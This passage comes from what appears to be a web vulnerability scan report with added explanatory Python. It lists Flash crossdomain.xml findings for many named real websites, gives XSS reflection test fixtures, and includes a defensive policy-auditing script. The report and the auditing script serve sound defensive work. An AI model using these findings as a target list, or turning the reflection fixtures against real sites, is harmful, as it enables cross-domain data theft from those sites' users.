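    + b'\r\n\r\n<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">\n'
)

# "Document Moved" page: payload once in an unquoted META attribute and once
# inside a double-quoted href.
REDIRECT_ATTR = (
    b"HTTP/1.1 302 URL Redirect\r\nContent-Type: text/html\r\n"
    b"Location: http://edge.example/favicon.ico?" + PAYLOAD_ATTR.encode()
    + b"=1\r\n\r\n<html><head><title>Document Moved</title>\n"
    b"<META URL=http://edge.example/favicon.ico?" + PAYLOAD_ATTR.encode()
    + b'=1">\n</head><body><h1>Object Moved</h1>This document may be found '
    b'<a href="http://edge.example/favicon.ico?' + PAYLOAD_ATTR.encode()
    + b'=1">here</a></body></html>'
)

# Same reflection on a rendered 200 page: nothing mitigates it.
PLAIN_200 = (
    b"HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n"
    b"<html><body>Not found: " + PAYLOAD_TEXT.encode() + b"</body></html>"
)

if __name__ == "__main__":
    print(assess(REDIRECT_ATTR, PAYLOAD_ATTR))
```

The context classifier deliberately reports every occurrence: on the "Document Moved" pages above the same parameter name is reflected twice, once unquoted in the META tag and once inside a quoted href, which is why the report lists two separate findings per host.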

7. Flash cross-domain policy
There are 550 instances of this issue:


7.1. http://ad.doubleclick.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 258
Last-Modified: Thu, 18 Sep 2003 20:42:14 GMT
Date: Sat, 02 Apr 2011 12:56:49 GMT

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.doubleclick.net -->
<cross-domain-policy>

...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

7.2. http://fls.doubleclick.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://fls.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: fls.doubleclick.net

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy
Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT
Date: Sat, 02 Apr 2011 03:31:36 GMT
Expires: Thu, 31 Mar 2011 03:30:21 GMT
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Age: 37531
Cache-Control: public, max-age=86400

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.doubleclick.net -->
<cross-domain-policy>
<site-
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

7.3. http://s0.2mdn.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://s0.2mdn.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: s0.2mdn.net

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy
Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT
Date: Sat, 02 Apr 2011 11:30:43 GMT
Expires: Thu, 31 Mar 2011 11:30:14 GMT
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Age: 5168
Cache-Control: public, max-age=86400

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.doubleclick.net -->
<cross-domain-policy>
<site-
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

7.4. http://smp.adviva.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://smp.adviva.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: smp.adviva.net

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:57:10 GMT
Server: Apache/2.2.11 (Unix) mod_perl/2.0.4 Perl/v5.10.0
Last-Modified: Tue, 17 Nov 2009 11:38:46 GMT
ETag: "c20ce1-110-4788f91a4dd80"
Accept-Ranges: bytes
Content-Length: 272
Connection: close
Content-Type: application/xml

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://ads.specificmedia.com -->
<cross-d
...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...

7.5. http://www.43things.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.43things.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.43things.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:13:04 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Wed, 11 May 2005 21:41:11 GMT
Accept-Ranges: bytes
Content-Length: 204
Cache-Control: max-age=1
Expires: Sat, 02 Apr 2011 14:13:05 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-poli
...[SNIP]...

7.6. http://www.about.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.about.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, and uses a wildcard to specify allowed domains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.about.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 12:37:24 GMT
Server: Apache
Vary: *
PRAGMA: no-cache
P3P: CP="IDC DSP COR DEVa TAIa OUR BUS UNI"
Cache-Control: max-age=3600
Expires: Sat, 02 Apr 2011 13:37:24 GMT
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
<allow-access-from domain="*.specials.about.com" />
...[SNIP]...

7.7. http://www.accesshollywood.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.accesshollywood.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.accesshollywood.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 PHP/5.1.6
Content-Type: application/xml
Content-Length: 232
X-Aicache-OS: 64.210.193.113:80
Expires: Sat, 02 Apr 2011 13:45:42 GMT
Date: Sat, 02 Apr 2011 13:45:42 GMT
Connection: close
Set-Cookie: ak-mobile-detected=no; expires=Sun, 03-Apr-2011 13:45:42 GMT; path=/
Vary: User-Agent

<?xml version="1.0" encoding="UTF-8"?>
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="all"/>
   <allow-access-from domain="*" />
   <allow-http-request-headers-from domain="*" heade
...[SNIP]...

7.8. http://www.accuweather.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.accuweather.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, uses a wildcard to specify allowed domains, and allows access from specific other domains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.accuweather.com

Response

HTTP/1.0 200 OK
Cache-Control: max-age=7200
Content-Length: 1403
Content-Type: text/xml
Last-Modified: Tue, 09 Feb 2010 20:00:39 GMT
Accept-Ranges: bytes
ETag: "c28f298dc2a9ca1:322cf"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 12:43:39 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
<allow-access-from domain="*.accuweather.com" />
<allow-access-from domain="*.accuweatherchannel.com" />
<allow-access-from domain="*.discovery.com" />
<allow-access-from domain="*.oddcast.com" />
<allow-access-from domain="*.ucview.com" />
<allow-access-from domain="*.2mdn.net" secure="true" />
...[SNIP]...
<allow-access-from domain="*.doubleclick.net" secure="true" />
...[SNIP]...
<allow-access-from domain="*.doubleclick.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.adcdn.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.dartmotif.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.aolcdn.com" secure="true" />
...[SNIP]...
<allow-access-from domain="maps.google.com" />
<allow-access-from domain="maps.yahooapis.com"/>
<allow-access-from domain="spm161.brinkster.net" />
<allow-access-from domain="www.dotglu.com" />
<allow-access-from domain="www.johnfrieda.com" />
<allow-access-from domain="www.travelboards.com" />
<allow-access-from domain="www.topix.com"/>
<allow-access-from domain="66.42.146.50" />
<allow-access-from domain="66.42.146.66" />
<allow-access-from domain="68.167.121.226" />
...[SNIP]...
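The issue details for 7.1, 7.6 and 7.8 apply three tests to a policy: access from any domain, wildcard domains, and named domains. The following Python, added here as an example and not code from the XSS.CX report or from the scanner, runs the same tests over a policy file and also flags two things visible in the policies above that the report text does not call out: allow-access-from entries with secure="false" (a policy served over HTTPS then also trusts SWFs loaded over plain HTTP) and a site-control meta-policy of "all" (any policy file on the host, not only /crossdomain.xml, can widen access). The three sample policies are constructed with placeholder domains. The report rates every policy in this section High because each allows any domain; the Medium and Low rungs for wildcard-only and named-only policies are this example's own scale.

```python
"""Audit a Flash crossdomain.xml policy.

Added example, not code from the XSS.CX report or from Burp Suite: classify
each allow-access-from entry (any domain, wildcard, specific), note entries
with secure="false", and note a permissive site-control meta-policy.
"""
import xml.etree.ElementTree as ET


def audit_policy(xml_text: str) -> dict:
    """Classify every allow-access-from entry and rate the policy.

    'High' for an any-domain policy matches the report; the Medium/Low rungs
    for wildcard-only and specific-only policies are this example's choice.
    """
    root = ET.fromstring(xml_text)    # expat ignores the external DTD reference
    if root.tag != "cross-domain-policy":
        raise ValueError("not a cross-domain-policy document")
    result = {"any_domain": [], "wildcard": [], "specific": [],
              "insecure": [], "meta_policy": None, "severity": "Information"}
    site = root.find("site-control")
    if site is not None:
        result["meta_policy"] = site.get("permitted-cross-domain-policies")
    for entry in root.findall("allow-access-from"):
        domain = entry.get("domain", "")
        if domain == "*":
            result["any_domain"].append(domain)
        elif "*" in domain:
            result["wildcard"].append(domain)
        elif domain:
            result["specific"].append(domain)
        # Flash defaults secure to true for policies served over HTTPS
        if entry.get("secure", "true").lower() == "false":
            result["insecure"].append(domain)
    if result["any_domain"]:
        result["severity"] = "High"
    elif result["wildcard"]:
        result["severity"] = "Medium"
    elif result["specific"]:
        result["severity"] = "Low"
    return result


def describe(result: dict) -> list:
    """Turn the findings into the phrases the report uses under 'Issue detail'."""
    notes = []
    if result["any_domain"]:
        notes.append("allows access from any domain")
    if result["wildcard"]:
        notes.append("uses a wildcard to specify allowed domains: "
                     + ", ".join(result["wildcard"]))
    if result["specific"]:
        notes.append("allows access from specific other domains: "
                     + ", ".join(result["specific"]))
    if result["insecure"]:
        notes.append('secure="false" on: ' + ", ".join(result["insecure"]))
    if result["meta_policy"] == "all":
        notes.append("meta-policy 'all' lets any policy file on the host widen access")
    return notes


# Constructed sample policies modelled on the ones in the report; the domains
# are placeholders.
OPEN_POLICY = """<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
  <site-control permitted-cross-domain-policies="all"/>
  <allow-access-from domain="*" secure="false"/>
</cross-domain-policy>"""

MIXED_POLICY = """<?xml version="1.0"?>
<cross-domain-policy>
  <allow-access-from domain="*"/>
  <allow-access-from domain="*.example.com"/>
  <allow-access-from domain="partner.example.net" secure="true"/>
</cross-domain-policy>"""

# The corrected form: master policy only, named origins, HTTPS-only trust.
HARDENED_POLICY = """<?xml version="1.0"?>
<cross-domain-policy>
  <site-control permitted-cross-domain-policies="master-only"/>
  <allow-access-from domain="www.example.com" secure="true"/>
</cross-domain-policy>"""

if __name__ == "__main__":
    for name, policy in [("open", OPEN_POLICY), ("mixed", MIXED_POLICY),
                         ("hardened", HARDENED_POLICY)]:
        found = audit_policy(policy)
        print(name, found["severity"], describe(found))
```

Note that a domain="*" entry makes every other entry redundant: the named and wildcard entries in 7.8 restrict nothing while the wildcard-all line is present, and the secure="true" on the ad-network entries there is undone by the unqualified "*" above them.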

7.9. http://www.addictinggames.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addictinggames.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.addictinggames.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 Resin/3.1.9 PHP/5.3.1
Last-Modified: Fri, 11 Feb 2011 23:55:49 GMT
Accept-Ranges: bytes
Content-Length: 421
Cache-Control: public, max-age=86400
Content-Type: application/xml
Date: Sat, 02 Apr 2011 13:35:47 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <!-- meta policy -->
   <site-control permitted-cross-domain-po
...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...

7.10. http://www.adriver.ru/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.adriver.ru
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.adriver.ru

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:05:32 GMT
Server: Apache
Last-Modified: Thu, 14 Oct 2010 08:34:06 GMT
ETag: "458c0d-ef-4928f92b29b80"
Accept-Ranges: bytes
Content-Length: 239
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="by-content-type"/>
   <allow-access-from domain="*" to-ports="80"/>
   <allow-http-request-headers-from domain="
...[SNIP]...

7.11. http://www.ajc.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ajc.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.ajc.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.3 (CentOS)
Content-Length: 100
Content-Type: text/xml
Cache-Control: max-age=1
Date: Sat, 02 Apr 2011 13:40:39 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

7.12. http://www.allvoices.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.allvoices.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.allvoices.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:32:32 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Thu, 31 Mar 2011 17:01:16 GMT
ETag: "578d4b-65-49fca3dce8f00"
Accept-Ranges: bytes
Content-Length: 101
Vary: Accept-Encoding
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

7.13. http://www.ally.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ally.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.ally.com

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy; charset=UTF-8
X-Powered-By: Servlet/2.5 JSP/2.1
X-UA-Compatible: IE=8
X-UA-Compatible: IE=8
Date: Sat, 02 Apr 2011 13:43:18 GMT
Content-Length: 279
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-pol
...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...

7.14. http://www.ancestry.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ancestry.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.ancestry.com

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: VARSESSION=S=2To6XE41OEWVVJSHFtyXpg%3d%3d&SLI=0&FIRSTSESSION=1&ITT=0; domain=.ancestry.com; path=/
Set-Cookie: ANCUUID=jSELjk5wn-UrtNkDbm1ZoC; domain=.ancestry.com; expires=Wed, 02-Apr-2031 13:23:58 GMT; path=/
Set-Cookie: ATT=0; domain=.ancestry.com; path=/
Set-Cookie: ANCATT=0; domain=.ancestry.com; path=/
Set-Cookie: SAC=; domain=.ancestry.com; expires=Tue, 02-Apr-1991 14:23:58 GMT; path=/
Set-Cookie: RMEATT=; domain=.ancestry.com; expires=Tue, 02-Apr-1991 14:23:58 GMT; path=/
Set-Cookie: VARS=; domain=.ancestry.com; expires=Tue, 02-Apr-1991 14:23:58 GMT; path=/
X-AspNet-Version: 4.0.30319
P3P: CP="CAO DSP COR DEVa TAIa OUR BUS UNI NAV INT PRE"
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:23:57 GMT
Connection: close
Content-Length: 227

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-po
...[SNIP]...

7.15. http://www.answerstv.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.answerstv.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.answerstv.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Mon, 13 Oct 2008 07:24:02 GMT
Accept-Ranges: bytes
ETag: "0d579aa42dc91:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:43:06 GMT
Connection: close
Content-Length: 355

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

7.16. http://www.apartmenthomeliving.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.apartmenthomeliving.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.apartmenthomeliving.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:18:34 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Thu, 28 Oct 2010 13:52:12 GMT
Accept-Ranges: bytes
Content-Length: 202
Vary: Accept-Encoding
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-polic
...[SNIP]...

7.17. http://www.apartments.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.apartments.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.apartments.com

Response

HTTP/1.1 200 OK
Content-Length: 320
Content-Type: text/xml
Last-Modified: Thu, 29 May 2008 18:49:26 GMT
Accept-Ranges: bytes
ETag: "7d3deb7bcc1c81:0"
Server: Microsoft-IIS/7.5
Set-Cookie: activitylogging=expirationday=3/31/2016 8:45:18 AM&lastactivitytime=4/2/2011 8:45:18 AM&visitid=0492ebbb-7f02-49b1-a38b-6abeb3a067f1&visitorid=71dabbfe-f70f-42a7-a087-3839130837e5&lastfrontdoor=APTS; expires=Thu, 31-Mar-2016 13:45:18 GMT; path=/
Set-Cookie: AptAff=bcebc5f18797507fbea1f95dd9c16e6f175b4a5d707036d32d014473ac89b5b1;Path=/
Set-Cookie: activitylogging=expirationday=3/31/2016 8:45:18 AM&lastactivitytime=4/2/2011 8:45:18 AM&visitid=0492ebbb-7f02-49b1-a38b-6abeb3a067f1&visitorid=71dabbfe-f70f-42a7-a087-3839130837e5&lastfrontdoor=APTS; expires=Thu, 31-Mar-2016 13:45:18 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:45:18 GMT
Connection: close
Set-Cookie: aptspersistence=578884780.24576.0000; path=/

<?xml version="1.0"?>
<!-- http://gdata.youtube.com/crossdomain.xml -->
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
...[SNIP]...

7.18. http://www.archive.org/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.archive.org
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.archive.org

Response

HTTP/1.1 200 OK
Server: nginx/0.8.32
Date: Sat, 02 Apr 2011 13:36:06 GMT
Content-Type: text/xml
Content-Length: 78
Last-Modified: Tue, 08 Mar 2011 00:34:01 GMT
Connection: close
Expires: Sat, 02 Apr 2011 19:36:06 GMT
Cache-Control: max-age=21600
Accept-Ranges: bytes

<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy>


7.19. http://www.askmen.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.askmen.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.askmen.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.11 (Unix) PHP/5.2.9
Last-Modified: Fri, 01 May 2009 14:10:22 GMT
ETag: "4d6cce-d3-468da5f967d54"-gzip
ServerHost: (null)
Content-Type: application/xml
Expires: Sat, 02 Apr 2011 13:26:34 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 02 Apr 2011 13:26:34 GMT
Content-Length: 211
Connection: close
Set-Cookie: NSC_btlnfo_iuuq_wjq=ffffffff090f1b3545525d5f4f58455e445a4a423660;path=/;httponly

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-
...[SNIP]...

7.20. http://www.atom.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.atom.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.atom.com

Response

HTTP/1.0 200 OK
Server: Apache-Coyote/1.1
ETag: W/"138-1300820240000"
Last-Modified: Tue, 22 Mar 2011 18:57:20 GMT
Content-Type: text/xml
Content-Length: 138
INFO_HOST: www.atom.com
Cache-Control: max-age=837
Expires: Sat, 02 Apr 2011 14:11:37 GMT
Date: Sat, 02 Apr 2011 13:57:40 GMT
Connection: close
Set-Cookie: ak-mobile-detected=no; expires=Sat, 02-Apr-2011 19:57:40 GMT; path=/
Vary: User-Agent

<cross-domain-policy>
<allow-access-from domain="*"/>
<allow-http-request-headers-from domain="*" headers="*"/>
</cross-domain-policy>

7.21. http://www.babelgum.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.babelgum.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.babelgum.com

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
Content-Type: text/xml
ETag: "f6804c-d0-490c48be6ef80"
Server: Apache/2.2.16
Age: 228561
Date: Sat, 02 Apr 2011 13:41:19 GMT
Last-Modified: Tue, 21 Sep 2010 12:55:42 GMT
Content-Length: 208
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-p
...[SNIP]...

7.22. http://www.biblegateway.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.biblegateway.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.biblegateway.com

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Sat, 02 Apr 2011 13:34:50 GMT
Content-Type: text/xml; charset=utf-8
Connection: close
Vary: Accept-Encoding
Last-Modified: Thu, 31 Mar 2011 20:34:45 GMT
ETag: "9d7bf-cd-39486340"
Accept-Ranges: bytes
Content-Length: 205

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-pol
...[SNIP]...

7.23. http://www.bigpoint.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bigpoint.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.bigpoint.com

Response

HTTP/1.0 200 OK
